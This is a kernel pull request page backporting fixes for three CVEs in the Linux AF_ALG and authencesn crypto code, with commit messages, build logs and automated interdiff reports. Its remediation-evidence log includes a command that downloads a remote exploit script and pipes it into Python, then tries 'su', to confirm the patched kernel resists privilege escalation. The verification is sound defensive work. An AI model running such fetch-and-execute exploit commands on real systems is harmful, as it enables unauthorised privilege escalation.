Skip to content

[LTS 8.6] CVE-2026-23060, CVE-2026-31431, CVE-2026-31677#1168

Merged
PlaidCat merged 10 commits into
ciqlts8_6from
{jmaple}_ciqlts8_6
May 1, 2026
Merged

[LTS 8.6] CVE-2026-23060, CVE-2026-31431, CVE-2026-31677#1168
PlaidCat merged 10 commits into
ciqlts8_6from
{jmaple}_ciqlts8_6

Conversation

@PlaidCat

@PlaidCat PlaidCat commented May 1, 2026

Copy link
Copy Markdown
Collaborator

Sourced from:
#1165

CVE Remediation evidence

[jmaple@devbox lts-8.6]$ cat cve.log
Script started on 2026-05-01 02:28:57+00:00
bash-4.4$ sudo dnf install python3.11
Last metadata expiration check: 0:04:17 ago on Fri 01 May 2026 02:24:47 AM UTC.
Package python3.11-3.11.13-7.el8_10.x86_64 is already installed.
Dependencies resolved.
Nothing to do.
Complete!
bash-4.4$ uname -a
Linux localhost.localdomain 4.18.0-jmaple_ciqlts8_6-2ebd3230218c+ #1 SMP Fri May 1 02:04:03 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux
bash-4.4$ curl https://copy.fail/exp | python3.11 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   4274      0 --:--:-- --:--:-- --:--:--  4274
Password: su: Authentication failure
Password:
bash-4.4$ exit
exit

Script done on 2026-05-01 02:29:44+00:00

BUILD

(.venv) [jmaple@devbox lts-9.2]$  egrep -B 5 -A 5 "\[TIMER\]|^Starting Build" $(ls -t kbuild* | head -n1)
/home/jmaple/workspace/kt_prod/kernels/lts-9.2/kernel-src-tree
Running make mrproper...
[TIMER]{MRPROPER}: 4s
x86_64 architecture detected, copying config
'configs/kernel-x86_64-rhel.config' -> '.config'
Setting Local Version for build
CONFIG_LOCALVERSION="-jmaple_ciqlts9_2-51da7d5f804b"
Making olddefconfig
--
  HOSTCC  scripts/kconfig/util.o
  HOSTLD  scripts/kconfig/conf
#
# configuration written to .config
#
Starting Build
  SYSHDR  arch/x86/include/generated/uapi/asm/unistd_32.h
  SYSHDR  arch/x86/include/generated/uapi/asm/unistd_64.h
  SYSHDR  arch/x86/include/generated/uapi/asm/unistd_x32.h
  SYSTBL  arch/x86/include/generated/asm/syscalls_32.h
  SYSHDR  arch/x86/include/generated/asm/unistd_32_ia32.h
--
  LD [M]  sound/xen/snd_xen_front.ko
  BTF [M] sound/x86/snd-hdmi-lpe-audio.ko
  BTF [M] sound/virtio/virtio_snd.ko
  BTF [M] virt/lib/irqbypass.ko
  BTF [M] sound/xen/snd_xen_front.ko
[TIMER]{BUILD}: 1075s
Making Modules
  INSTALL /lib/modules/5.14.0-jmaple_ciqlts9_2-51da7d5f804b+/kernel/arch/x86/crypto/blake2s-x86_64.ko
  INSTALL /lib/modules/5.14.0-jmaple_ciqlts9_2-51da7d5f804b+/kernel/arch/x86/crypto/blowfish-x86_64.ko
  INSTALL /lib/modules/5.14.0-jmaple_ciqlts9_2-51da7d5f804b+/kernel/arch/x86/crypto/camellia-aesni-avx-x86_64.ko
  INSTALL /lib/modules/5.14.0-jmaple_ciqlts9_2-51da7d5f804b+/kernel/arch/x86/crypto/camellia-aesni-avx2.ko
--
  SIGN    /lib/modules/5.14.0-jmaple_ciqlts9_2-51da7d5f804b+/kernel/virt/lib/irqbypass.ko
  SIGN    /lib/modules/5.14.0-jmaple_ciqlts9_2-51da7d5f804b+/kernel/sound/usb/snd-usb-audio.ko
  SIGN    /lib/modules/5.14.0-jmaple_ciqlts9_2-51da7d5f804b+/kernel/sound/soundcore.ko
  SIGN    /lib/modules/5.14.0-jmaple_ciqlts9_2-51da7d5f804b+/kernel/sound/usb/usx2y/snd-usb-us122l.ko
  DEPMOD  /lib/modules/5.14.0-jmaple_ciqlts9_2-51da7d5f804b+
[TIMER]{MODULES}: 5s
Making Install
sh ./arch/x86/boot/install.sh \
        5.14.0-jmaple_ciqlts9_2-51da7d5f804b+ arch/x86/boot/bzImage \
        System.map "/boot"
[TIMER]{INSTALL}: 38s
Checking kABI
kABI check passed
Setting Default Kernel to /boot/vmlinuz-5.14.0-jmaple_ciqlts9_2-51da7d5f804b+ and Index to 2
Hopefully Grub2.0 took everything ... rebooting after time metrices
[TIMER]{MRPROPER}: 4s
[TIMER]{BUILD}: 1075s
[TIMER]{MODULES}: 5s
[TIMER]{INSTALL}: 38s
[TIMER]{TOTAL} 1127s
Rebooting in 10 seconds

Multiarch build

https://github.com/ctrliq/kernel-src-tree/actions/runs/25199479117/job/73887282043

Herbert Xu added 7 commits April 30, 2026 21:34
jira VULN-181877
cve-pre CVE-2026-31431
commit-author Norbert Szetei <norbert@doyensec.com>
commit 62397b4
commit-source centos-stream-9

The AF_ALG interface fails to unmark the end of a Scatter/Gather List (SGL)
when chaining a new af_alg_tsgl structure. If a sendmsg() fills an SGL
exactly to MAX_SGL_ENTS, the last entry is marked as the end. A subsequent
sendmsg() allocates a new SGL and chains it, but fails to clear the end
marker on the previous SGL's last data entry.

This causes the crypto scatterwalk to hit a premature end, returning NULL
on sg_next() and leading to a kernel panic during dereference.

Fix this by explicitly unmarking the end of the previous SGL when
performing sg_chain() in af_alg_alloc_tsgl().

Fixes: 8ff5909 ("crypto: algif_skcipher - User-space interface for skcipher operations")
	Signed-off-by: Norbert Szetei <norbert@doyensec.com>
	Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181877
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit a664bf3
commit-source centos-stream-9
upstream-diff |
	Contextual changes required for the following
	crypto/af_alg.c due to missing commit b2a4411
	  ("crypto: doc - fix kernel-doc notation in chacha.c and af_alg.c"),
	crypto_alfig_aead.c in _aead_recvmsg due to missing 8d60539
	  ("crypto: null - Remove VLA usage of skcipher") that replaces
	  'struct crypto_skcipher' with 'struct crypto_sync_skcipher'
	include/crypto/if_alg.h that had different func declarations around
	  'af_alg_count_tsgl' and 'af_alg_pull_tsgl'

This mostly reverts commit 72548b0 except for the copying of
the associated data.

There is no benefit in operating in-place in algif_aead since the
source and destination come from different mappings.  Get rid of
all the complexity added for in-place operation and just copy the
AD directly.

Fixes: 72548b0 ("crypto: algif_aead - copy AAD from src to dst")
    Reported-by: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-182987
cve CVE-2026-31677
commit-author Douya Le <ldy3087146292@gmail.com>
commit 8eceab1
commit-source centos-stream-9

Make af_alg_get_rsgl() limit each RX scatterlist extraction to the
remaining receive buffer budget.

af_alg_get_rsgl() currently uses af_alg_readable() only as a gate
before extracting data into the RX scatterlist. Limit each extraction
to the remaining af_alg_rcvbuf(sk) budget so that receive-side
accounting matches the amount of data attached to the request.

If skcipher cannot obtain enough RX space for at least one chunk while
more data remains to be processed, reject the recvmsg call instead of
rounding the request length down to zero.

Fixes: e870456 ("crypto: algif_skcipher - overhaul memory management")
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Co-developed-by: Yuan Tan <yuantan098@gmail.com>
    Signed-off-by: Yuan Tan <yuantan098@gmail.com>
    Suggested-by: Xin Liu <bird@lzu.edu.cn>
    Signed-off-by: Douya Le <ldy3087146292@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-182987
cve-bf CVE-2026-31677
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 31d0015
commit-source centos-stream-9

When page reassignment was added to af_alg_pull_tsgl the original
loop wasn't updated so it may try to reassign one more page than
necessary.

Add the check to the reassignment so that this does not happen.

Also update the comment which still refers to the obsolete offset
argument.

    Reported-by: syzbot+d23888375c2737c17ba5@syzkaller.appspotmail.com
Fixes: e870456 ("crypto: algif_skcipher - overhaul memory management")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>

Signed-off-by: Herbert Xu <herbert.xu@redhat.com>
…SN spec

jira VULN-175565
cve CVE-2026-23060
commit-author Taeyang Lee <0wn@theori.io>
commit 2397e92
commit-source centos-stream-9

authencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than
the minimum expected length, crypto_authenc_esn_decrypt() can advance past
the end of the destination scatterlist and trigger a NULL pointer dereference
in scatterwalk_map_and_copy(), leading to a kernel panic (DoS).

Add a minimum AAD length check to fail fast on invalid inputs.

Fixes: 104880a ("crypto: authencesn - Convert to new AEAD interface")
    Reported-By: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
…e decryption

jira VULN-181877
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit e024941
commit-source centos-stream-9
commit-note CentOS attributes this to CVE-2026-31431 but it fixes the
	same code commit as CVE-2026-23060. I defaulted to the centos
	attribution for consistency with our upstream.

When decrypting data that is not in-place (src != dst), there is
no need to save the high-order sequence bits in dst as it could
simply be re-copied from the source.

However, the data to be hashed need to be rearranged accordingly.

    Reported-by: Taeyang Lee <0wn@theori.io>
Fixes: 104880a ("crypto: authencesn - Convert to new AEAD interface")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>

Thanks,

    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181877
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 1f48ad3
commit-source centos-stream-9

The src SG list offset wasn't set properly when decrypting in-place,
fix it.

    Reported-by: Wolfgang Walter <linux@stwm.de>
Fixes: e024941 ("crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
@PlaidCat PlaidCat requested a review from a team May 1, 2026 02:35
@PlaidCat PlaidCat self-assigned this May 1, 2026
@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🤖 Validation Checks In Progress Workflow run: https://github.com/ctrliq/kernel-src-tree/actions/runs/25199816085

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Upstream Linux Kernel Commit Check

  • ❌ PR commit 18b86ddf564d (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) references CVE-2026-31431 but
    upstream commit e02494114ebf has no CVE assigned

This is an automated message from the kernel commit checker workflow.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Interdiff Analysis

  • ⚠️ PR commit c476c6e98ec6 (crypto: algif_aead - Revert to operating out-of-place) → upstream a664bf3d603d
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -526,10 +526,12 @@
 /**
  * aead_count_tsgl - Count number of TX SG entries
  *
- * The counting starts from the beginning of the SGL to @bytes.
+ * The counting starts from the beginning of the SGL to @bytes. If
+ * an offset is provided, the counting of the SG entries starts at the offset.
  *
  * @sk socket of connection to user space
  * @bytes Count the number of SG entries holding given number of bytes.
+ * @offset Start the counting of SG entries from the given offset.
  * @return Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes)
@@ -563,12 +565,16 @@
  * aead_pull_tsgl - Release the specified buffers from TX SGL
  *
  * If @dst is non-null, reassign the pages to dst. The caller must release
- * the pages.
+ * the pages. If @dst_offset is given only reassign the pages to @dst starting
+ * at the @dst_offset (byte). The caller must ensure that @dst is large
+ * enough (e.g. by using af_alg_count_tsgl with the same offset).
  *
  * @sk socket of connection to user space
  * @used Number of bytes to pull from TX SGL
  * @dst If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
  *	caller must release the buffers in dst.
+ * @dst_offset Reassign the TX SGL from given offset. All buffers before
+ *	       reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst)
 {
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -211,13 +212,72 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sg;
 
-	err = crypto_aead_copy_sgl(null_tfm, tsgl_src, rsgl_src,
-				   ctx->aead_assoclen);
-	if (err)
-		goto free;
+	if (ctx->enc) {
+		/*
+		 * Encryption operation - The in-place cipher operation is
+		 * achieved by the following operation:
+		 *
+		 * TX SGL: AAD || PT
+		 *	    |	   |
+		 *	    | copy |
+		 *	    v	   v
+		 * RX SGL: AAD || PT || Tag
+		 */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, processed);
+		if (err)
+			goto free;
+		af_alg_pull_tsgl(sk, processed, NULL, 0);
+	} else {
+		/*
+		 * Decryption operation - To achieve an in-place cipher
+		 * operation, the following  SGL structure is used:
+		 *
+		 * TX SGL: AAD || CT || Tag
+		 *	    |	   |	 ^
+		 *	    | copy |	 | Create SGL link.
+		 *	    v	   v	 |
+		 * RX SGL: AAD || CT ----+
+		 */
+
+		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, outlen);
+		if (err)
+			goto free;
+
+		/* Create TX SGL for tag and chain it to RX SGL. */
+		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
+						       processed - as);
+		if (!areq->tsgl_entries)
+			areq->tsgl_entries = 1;
+		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
+							 areq->tsgl_entries),
+					  GFP_KERNEL);
+		if (!areq->tsgl) {
+			err = -ENOMEM;
+			goto free;
+		}
+		sg_init_table(areq->tsgl, areq->tsgl_entries);
+
+		/* Release TX SGL, except for tag data and reassign tag data. */
+		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
+
+		/* chain the areq TX SGL holding the tag with RX SGL */
+		if (usedpages) {
+			/* RX SGL present */
+			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+
+			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
+			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
+				 areq->tsgl);
+		} else
+			/* no RX SGL present (e.g. authentication only) */
+			rsgl_src = areq->tsgl;
+	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
 			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -637,8 +637,7 @@
 /**
  * af_alg_count_tsgl - Count number of TX SG entries
  *
- * The counting starts from the beginning of the SGL to @bytes. If
- * an @offset is provided, the counting of the SG entries starts at the @offset.
+ * The counting starts from the beginning of the SGL to @bytes.
  *
  * @sk: socket of connection to user space
  * @bytes: Count the number of SG entries holding given number of bytes.
@@ -642,7 +641,6 @@
  *
  * @sk: socket of connection to user space
  * @bytes: Count the number of SG entries holding given number of bytes.
- * @offset: Start the counting of SG entries from the given offset.
  * Return: Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset)
@@ -676,9 +660,7 @@
  * af_alg_pull_tsgl - Release the specified buffers from TX SGL
  *
  * If @dst is non-null, reassign the pages to @dst. The caller must release
- * the pages. If @dst_offset is given only reassign the pages to @dst starting
- * at the @dst_offset (byte). The caller must ensure that @dst is large
- * enough (e.g. by using af_alg_count_tsgl with the same offset).
+ * the pages.
  *
  * @sk: socket of connection to user space
  * @used: Number of bytes to pull from TX SGL
@@ -682,8 +664,6 @@
  * @used: Number of bytes to pull from TX SGL
  * @dst: If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
  *	 caller must release the buffers in dst.
- * @dst_offset: Reassign the TX SGL from given offset. All buffers before
- *	        reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset)
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -26,7 +26,6 @@
 #include <crypto/internal/aead.h>
 #include <crypto/scatterwalk.h>
 #include <crypto/if_alg.h>
-#include <crypto/skcipher.h>
 #include <linux/init.h>
 #include <linux/list.h>
 #include <linux/kernel.h>
@@ -72,7 +71,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct af_alg_ctx *ctx = ask->private;
 	struct crypto_aead *tfm = pask->private;
-	unsigned int i, as = crypto_aead_authsize(tfm);
+	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -182,64 +177,7 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
-	if (ctx->enc) {
-		/*
-		 * Encryption operation - The in-place cipher operation is
-		 * achieved by the following operation:
-		 *
-		 * TX SGL: AAD || PT
-		 *	    |	   |
-		 *	    | copy |
-		 *	    v	   v
-		 * RX SGL: AAD || PT || Tag
-		 */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
-			      processed);
-		af_alg_pull_tsgl(sk, processed, NULL, 0);
-	} else {
-		/*
-		 * Decryption operation - To achieve an in-place cipher
-		 * operation, the following  SGL structure is used:
-		 *
-		 * TX SGL: AAD || CT || Tag
-		 *	    |	   |	 ^
-		 *	    | copy |	 | Create SGL link.
-		 *	    v	   v	 |
-		 * RX SGL: AAD || CT ----+
-		 */
-
-		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
-
-		/* Create TX SGL for tag and chain it to RX SGL. */
-		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
-						       processed - as);
-		if (!areq->tsgl_entries)
-			areq->tsgl_entries = 1;
-		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
-							 areq->tsgl_entries),
-					  GFP_KERNEL);
-		if (!areq->tsgl) {
-			err = -ENOMEM;
-			goto free;
-		}
-		sg_init_table(areq->tsgl, areq->tsgl_entries);
-
-		/* Release TX SGL, except for tag data and reassign tag data. */
-		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
-
-		/* chain the areq TX SGL holding the tag with RX SGL */
-		if (usedpages) {
-			/* RX SGL present */
-			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
-			struct scatterlist *sg = sgl_prev->sgt.sgl;
-
-			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
-			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
-		} else
-			/* no RX SGL present (e.g. authentication only) */
-			rsgl_src = areq->tsgl;
-	}
+	memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
@@ -242,7 +180,7 @@
 	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
 			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
--- b/include/crypto/if_alg.h
+++ b/include/crypto/if_alg.h
@@ -230,9 +230,8 @@
 	return PAGE_SIZE <= af_alg_rcvbuf(sk);
 }
 
-unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset);
-void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
-		      size_t dst_offset);
+unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes);
+void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst);
 void af_alg_wmem_wakeup(struct sock *sk);
 int af_alg_wait_for_data(struct sock *sk, unsigned flags, unsigned min);
 int af_alg_sendmsg(struct socket *sock, struct msghdr *msg, size_t size,

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -523,15 +523,15 @@
 /**
- * aead_count_tsgl - Count number of TX SG entries
+ * af_alg_count_tsgl - Count number of TX SG entries
  *
  * The counting starts from the beginning of the SGL to @bytes. If
- * an offset is provided, the counting of the SG entries starts at the offset.
+ * an @offset is provided, the counting of the SG entries starts at the @offset.
  *
- * @sk socket of connection to user space
- * @bytes Count the number of SG entries holding given number of bytes.
- * @offset Start the counting of SG entries from the given offset.
- * @return Number of TX SG entries found given the constraints
+ * @sk: socket of connection to user space
+ * @bytes: Count the number of SG entries holding given number of bytes.
+ * @offset: Start the counting of SG entries from the given offset.
+ * Return: Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset)
 {
-	struct alg_sock *ask = alg_sk(sk);
-	struct af_alg_ctx *ctx = ask->private;
+	const struct alg_sock *ask = alg_sk(sk);
+	const struct af_alg_ctx *ctx = ask->private;
@@ -546,4 +657,4 @@
-		struct scatterlist *sg = sgl->sg;
+		const struct scatterlist *sg = sgl->sg;
 
 		for (i = 0; i < sgl->cur; i++) {
 			size_t bytes_count;
@@ -571,16 +682,16 @@
- * aead_pull_tsgl - Release the specified buffers from TX SGL
+ * af_alg_pull_tsgl - Release the specified buffers from TX SGL
  *
- * If @dst is non-null, reassign the pages to dst. The caller must release
+ * If @dst is non-null, reassign the pages to @dst. The caller must release
  * the pages. If @dst_offset is given only reassign the pages to @dst starting
  * at the @dst_offset (byte). The caller must ensure that @dst is large
  * enough (e.g. by using af_alg_count_tsgl with the same offset).
  *
- * @sk socket of connection to user space
- * @used Number of bytes to pull from TX SGL
- * @dst If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
- *	caller must release the buffers in dst.
- * @dst_offset Reassign the TX SGL from given offset. All buffers before
- *	       reaching the offset is released.
+ * @sk: socket of connection to user space
+ * @used: Number of bytes to pull from TX SGL
+ * @dst: If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
+ *	 caller must release the buffers in dst.
+ * @dst_offset: Reassign the TX SGL from given offset. All buffers before
+ *	        reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset)
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -25,5 +25,4 @@
 #include <crypto/if_alg.h>
 #include <crypto/skcipher.h>
-#include <crypto/null.h>
 #include <linux/init.h>
 #include <linux/list.h>
@@ -73,6 +69,6 @@
-	struct aead_tfm *aeadc = pask->private;
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_skcipher *null_tfm = aeadc->null_tfm;
+	struct alg_sock *pask = alg_sk(psk);
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int i, as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
@@ -214,7 +184,7 @@
 	 */
 
 	/* Use the RX SGL as source (and destination) for crypto op. */
-	rsgl_src = areq->first_rsgl.sgl.sg;
+	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
 	if (ctx->enc) {
 		/*
@@ -227,10 +197,8 @@
 		 *	    v	   v
 		 * RX SGL: AAD || PT || Tag
 		 */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, processed);
-		if (err)
-			goto free;
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
+			      processed);
 		af_alg_pull_tsgl(sk, processed, NULL, 0);
 	} else {
 		/*
@@ -244,11 +212,8 @@
 		 * RX SGL: AAD || CT ----+
 		 */
 
-		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, outlen);
-		if (err)
-			goto free;
+		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
 
 		/* Create TX SGL for tag and chain it to RX SGL. */
 		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
@@ -271,10 +236,10 @@
 		if (usedpages) {
 			/* RX SGL present */
 			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+			struct scatterlist *sg = sgl_prev->sgt.sgl;
 
-			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
-			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
-				 areq->tsgl);
+			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
+			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
 		} else
 			/* no RX SGL present (e.g. authentication only) */
 			rsgl_src = areq->tsgl;
@@ -283,5 +248,5 @@
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
@@ -482,4 +447,4 @@
-	struct crypto_aead *tfm = aeadc->aead;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int ivlen = crypto_aead_ivsize(tfm);
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -319,7 +360,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct crypto_skcipher *tfm = pask->private;
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
 	sock_kzfree_s(sk, ctx->iv, crypto_skcipher_ivsize(tfm));
-	sock_kfree_s(sk, ctx, ctx->len);
-	af_alg_release_parent(sk);
+	if (ctx->state)
+		sock_kzfree_s(sk, ctx->state, crypto_skcipher_statesize(tfm));
--- b/include/crypto/if_alg.h
+++ b/include/crypto/if_alg.h
@@ -228,8 +229,5 @@
 
-int af_alg_alloc_tsgl(struct sock *sk);
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset);
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset);
-void af_alg_free_areq_sgls(struct af_alg_async_req *areq);
-int af_alg_wait_for_wmem(struct sock *sk, unsigned int flags);
 void af_alg_wmem_wakeup(struct sock *sk);
  • ⚠️ PR commit 547910e4c6ed (crypto: af_alg - limit RX SG extraction by receive buffer budget) → upstream 8eceab19eba9
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -90,14 +90,8 @@
 	 * If more buffers are to be expected to be processed, process only
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used) {
-		if (len < bs) {
-			err = -EINVAL;
-			goto free;
-		}
-
+	if (ctx->more || len < ctx->used)
 		len -= len % bs;
-	}
 
 	/*
 	 * Create a per request TX SGL for this request which tracks the

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -130,6 +130,11 @@
 	 * full block size buffers.
 	 */
 	if (ctx->more || len < ctx->used) {
+		if (len < bs) {
+			err = -EINVAL;
+			goto free;
+		}
+
 		len -= len % bs;
 		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
 	}

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -87,7 +87,6 @@
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used)
+	if (ctx->more || len < ctx->used) {
 		len -= len % bs;
-
-	/*
-	 * Create a per request TX SGL for this request which tracks the
+		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
+	}
  • ⚠️ PR commit 15531398a6d3 (crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec) → upstream 2397e9264676
    Differences found:
================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -290,6 +253,6 @@
 	u32 tmp[2];
 	int err;
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
+	if (req->src != dst)
  • ⚠️ PR commit 18b86ddf564d (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) → upstream e02494114ebf
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -179,10 +179,7 @@
 	authenc_esn_request_complete(areq, err);
 }
 
-static int crypto_authenc_esn_copy_sg(struct aead_request *req,
-				      struct scatterlist *src,
-				      struct scatterlist *dst,
-				      unsigned int len)
+static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
 	struct crypto_authenc_esn_ctx *ctx = crypto_aead_ctx(authenc_esn);
@@ -191,16 +188,11 @@
